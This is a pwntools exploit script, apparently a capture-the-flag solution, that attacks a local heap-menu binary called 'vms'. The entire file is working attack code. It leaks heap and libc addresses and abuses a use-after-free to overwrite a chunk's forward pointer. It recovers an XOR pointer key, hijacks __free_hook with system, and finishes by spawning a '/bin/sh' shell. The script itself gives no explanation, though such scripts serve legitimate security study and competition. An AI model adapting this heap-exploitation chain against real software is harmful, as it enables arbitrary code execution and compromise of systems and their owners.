@Q2h1Cg
Created June 28, 2016 15:40
from pwn import *
# context.log_level = "DEBUG"
# Binary under test and the libc it is expected to load at runtime; both are
# parsed up front so symbol/GOT lookups below resolve against these files.
vms = ELF("./vms")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.21.so")
# Local process handle shared by every menu helper in this script.
io = process("./vms")
def register(username, age):
    """Drive menu option 1: register *username* with *age*.

    Each prompt is consumed before the matching payload is sent so the
    reads stay in step with the target's output. The username is
    newline-terminated; the menu choice and the age are sent raw.
    """
    log.info("register: {} - {}".format(username, age))
    exchange = [
        ("> ", "1", io.send),
        ("bytes): ", username, io.sendline),
        ("(1-100)", str(age), io.send),
    ]
    for prompt, payload, send in exchange:
        io.recvuntil(prompt)
        send(payload)
def add_vuln_info(title, detail_length, detail, rank):
    """Drive menu option 2: create an entry with *title*, *detail* and *rank*.

    *detail_length* is the length announced to the target before the
    detail bytes are sent. A title of exactly 64 bytes, or a detail whose
    length equals *detail_length*, is sent without a trailing newline;
    anything shorter is newline-terminated so the target's read completes.
    """
    log.info("add vuln: {} - {} - {} - {}".format(title, detail_length, detail, rank))
    # Exactly 64 bytes fills the title field; shorter titles need the terminator.
    title_payload = title if len(title) == 64 else title + "\n"
    # Raw send when the announced length matches the data, line send otherwise.
    detail_sender = io.send if detail_length == len(detail) else io.sendline
    exchange = [
        ("> ", "2", io.send),
        ("bytes): ", title_payload, io.send),
        ("length(1-4096): ", str(detail_length), io.send),
        ("bytes): ", detail, detail_sender),
        ("(0-99999999999): ", str(rank), io.send),
    ]
    for prompt, payload, send in exchange:
        io.recvuntil(prompt)
        send(payload)
def edit_vuln_info(title, rank, detail):
    """Drive menu option 3: update the entry named *title*.

    The new *rank* is sent raw; the new *detail* is newline-terminated.
    A 64-byte title is sent without a terminator, as in add_vuln_info.
    """
    log.info("edit vuln: {} - {} - {}".format(title, rank, detail))
    title_payload = title if len(title) == 64 else title + "\n"
    exchange = [
        ("> ", "3", io.send),
        ("vuln title: ", title_payload, io.send),
        ("(0-99999999999): ", str(rank), io.send),
        ("bytes): ", detail, io.sendline),
    ]
    for prompt, payload, send in exchange:
        io.recvuntil(prompt)
        send(payload)
def delete_vuln_info(title):
    """Drive menu option 4: remove the entry named *title*.

    A 64-byte title is sent without a terminator, as in add_vuln_info.
    """
    log.info("delete vuln: {}".format(title))
    title_payload = title if len(title) == 64 else title + "\n"
    exchange = [
        ("> ", "4", io.send),
        ("vuln title: ", title_payload, io.send),
    ]
    for prompt, payload, send in exchange:
        io.recvuntil(prompt)
        send(payload)
def show_all_vulns():
    """Drive menu option 5: ask the target to print every entry.

    Nothing is read back here; callers parse the listing themselves.
    """
    log.info("show all vulns")
    io.recvuntil("> ")
    io.send("5")
# --- register ----------------------------------------------------------------
register("chu", 1)

# --- leak heap addr ----------------------------------------------------------
# Two entries are created and then freed in reverse order; the rank printed
# for the entry created next is read back as an address. The 0x150 offset is
# the author's; presumably the distance from the heap base to that chunk.
for idx in range(2):
    add_vuln_info("title{}".format(idx), 200, "detail{}".format(idx), 0)
for idx in (1, 0):
    delete_vuln_info("title{}".format(idx))
add_vuln_info("title2", 200, "detail2", 0)
show_all_vulns()
io.recvuntil("vuln rank: ")
HEAP_BASE = int(io.recvline().strip()) - 0x150
delete_vuln_info("title2")
log.success("base of heap => {}".format(hex(HEAP_BASE)))

# --- overwrite flink by UAF --------------------------------------------------
# Exactly 64 bytes long, so the helpers send it without a newline terminator.
FAKE_TITLE = "A" * 48 + p64(0) + p64(0x71)
add_vuln_info(FAKE_TITLE, 200, "detail0", 0)
add_vuln_info("title1", 200, "detail1", 0)
delete_vuln_info(FAKE_TITLE)
edit_vuln_info(FAKE_TITLE, HEAP_BASE + 0x58, "detail0")

# --- malloc to vuln2's detail ------------------------------------------------
add_vuln_info("title2", 200, "detail2", 0)
add_vuln_info("title3", 200, "detail3", 0)

# --- leak xor key ------------------------------------------------------------
show_all_vulns()
io.recvuntil("detail3")
io.recvuntil("rank: ")
raw_rank = int(io.recvline().strip())
# The target evidently prints the rank as a signed 64-bit value; a negative
# reading is folded back into the unsigned range before the XOR.
encrypted_detail_addr = raw_rank + (1 << 64) if raw_rank < 0 else raw_rank
ENCRYPT_KEY = encrypted_detail_addr ^ (HEAP_BASE + 0x80)
log.success("encrypt_key => {}".format(hex(ENCRYPT_KEY)))

# --- set global limit to bypass check ----------------------------------------
edit_vuln_info("title3", ENCRYPT_KEY ^ 0x603010, "detail3")
edit_vuln_info("title2", 0, p64(2 ** 63 - 1))

# --- leak libc ---------------------------------------------------------------
edit_vuln_info("title3", ENCRYPT_KEY ^ vms.got.get("atol"), "detail3")
show_all_vulns()
io.recvuntil("title2")
io.recvuntil("detail: ")
# Six address bytes are printed; pad to eight before unpacking.
leaked_atol = u64(io.recv(6) + "\x00\x00")
libc.address = leaked_atol - libc.symbols.get("atol")
log.success("libc base => {}".format(hex(libc.address)))
log.success("system => {}".format(hex(libc.symbols.get("system"))))

# --- use __free_hook bypass RELRO --------------------------------------------
edit_vuln_info("title3", ENCRYPT_KEY ^ libc.symbols.get("__free_hook"), "/bin/sh")
edit_vuln_info("title2", 0, p64(libc.symbols.get("system")))
delete_vuln_info("title3")

# --- spawn -------------------------------------------------------------------
io.interactive()